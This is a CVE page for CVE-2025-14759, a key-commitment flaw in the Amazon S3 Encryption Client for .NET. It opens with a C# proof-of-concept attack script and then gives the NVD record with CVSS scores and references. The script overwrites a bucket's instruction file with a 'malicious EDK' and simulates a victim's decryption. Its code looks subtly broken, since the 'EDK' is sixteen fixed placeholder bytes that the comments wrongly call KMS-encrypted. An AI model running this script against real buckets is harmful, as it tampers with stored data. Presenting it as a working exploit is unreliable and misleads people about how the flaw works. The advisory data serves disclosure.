CVE-2025-14759

// CVE-2025-14759 PoC - Amazon S3 Encryption Client for .NET EDK Replacement Attack // This PoC demonstrates the key commitment issue when EDK is stored in instruction file using Amazon.S3EncryptionClient; using Amazon.S3; using Amazon.S3.Model; public class CVE_2025_14759_PoC { private const string BucketName = "target-bucket"; private const string TargetObjectKey = "encrypted-file.txt"; private const string InstructionFileKey = "encrypted-file.txt.inst"; // Attacker-controlled EDK (encrypted with the same KMS key but different plaintext key) private static readonly byte[] MaliciousEDK = new byte[] { 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10 }; public static async Task PerformAttack() { var s3Client = new AmazonS3Client(); Console.WriteLine("[*] CVE-2025-14759 Attack Simulation"); Console.WriteLine("[*] Target: " + BucketName + "/" + TargetObjectKey); // Step 1: Download the original instruction file Console.WriteLine("[+] Step 1: Downloading original instruction file..."); var instructionResponse = await s3Client.GetObjectAsync(BucketName, InstructionFileKey); using (var reader = new StreamReader(instructionResponse.ResponseStream)) { var originalEDK = await reader.ReadToEndAsync(); Console.WriteLine("[*] Original EDK retrieved: " + originalEDK.Substring(0, 20) + "..."); } // Step 2: Replace the EDK with attacker-controlled key Console.WriteLine("[+] Step 2: Replacing EDK with malicious key..."); var maliciousInstruction = Convert.ToBase64String(MaliciousEDK); var putRequest = new PutObjectRequest { BucketName = BucketName, Key = InstructionFileKey, ContentBody = maliciousInstruction, ContentType = "application/octet-stream" }; await s3Client.PutObjectAsync(putRequest); Console.WriteLine("[+] Malicious EDK uploaded successfully"); Console.WriteLine("[!] Next victim decryption will use attacker's key"); } // Victim-side decryption (demonstrates the vulnerability impact) public static async Task VictimDecrypts() { Console.WriteLine("\n[*] Victim attempting to decrypt data..."); var encryptionClient = new AmazonS3EncryptionClientV2( new AmazonS3CryptoConfigurationV2(), new Amazon.Runtime.BasicAWSCredentials("AKIA...", "secret") ); // This will decrypt using the attacker's EDK, producing attacker-controlled plaintext var response = await encryptionClient.GetObjectAsync(BucketName, TargetObjectKey); using (var reader = new StreamReader(response.ResponseStream)) { var plaintext = await reader.ReadToEndAsync(); Console.WriteLine("[!] Decrypted content (may be attacker-controlled): " + plaintext); } } }

{"cve": {"id": "CVE-2025-14759", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-12-17T20:15:52.773", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing cryptographic key commitment in the Amazon S3 Encryption Client for .NET may allow a user with write access to the S3 bucket to introduce a new EDK that decrypts to different plaintext when the encrypted data key is stored in an \"instruction file\" instead of S3's metadata record.\n\nTo mitigate this issue, upgrade Amazon S3 Encryption Client for .NET to version 3.2.0 or later."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-327"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-032/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/amazon-s3-encryption-client-dotnet/releases/tag/release_2025-12-17", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/amazon-s3-encryption-client-dotnet/security/advisories/GHSA-4v42-65r3-3gjx", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}